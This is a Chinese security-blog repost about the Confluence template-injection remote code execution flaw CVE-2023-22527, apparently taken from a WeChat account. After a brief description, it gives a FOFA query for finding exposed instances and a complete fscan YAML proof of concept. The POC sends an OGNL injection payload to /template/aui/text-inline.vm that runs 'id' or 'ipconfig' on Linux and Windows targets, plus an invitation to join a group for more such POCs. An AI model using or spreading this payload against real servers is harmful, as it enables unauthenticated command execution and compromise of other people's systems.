Confluence远程代码执行漏洞(CVE-2023-22527)附fscan扫描 POC

admin 2024年1月25日14:08:16评论33 views字数 1719阅读5分43秒阅读模式

Confluence远程代码执行漏洞(CVE-2023-22527)附fscan扫描 POC

影响范围:

Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在模板注入漏洞,允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。

fofa语法:

icon_hash="-305179312"

poc复现:

name: poc-yaml-Confluence-CVE-2023-22527-rce
groups:
  linux:
- method: POST
    path:/template/aui/text-inline.vm
    headers:
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
    body:>-
        label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22id%22%7D%29%29
    follow_redirects:true
    expression:>
      response.status ==200&&
      response.headers["Cmd-Ret"].contains("uid=")
  windows:
- method: POST
    path:/template/aui/text-inline.vm
    headers:
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
    body:>-
        label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22ipconfig%22%7D%29%29
    follow_redirects:true
    expression:>
      response.status ==200&&
      response.headers["Cmd-Ret"].contains("Windows IP")
Confluence远程代码执行漏洞(CVE-2023-22527)附fscan扫描 POC

福利领取:

关注公众号回复“加群”,获取更多fscan相关poc

原文始发于微信公众号(安全小子大杂烩):Confluence远程代码执行漏洞(CVE-2023-22527)附fscan扫描 POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月25日14:08:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Confluence远程代码执行漏洞(CVE-2023-22527)附fscan扫描 POChttp://cn-sec.com/archives/2426283.html

发表评论

匿名网友 填写信息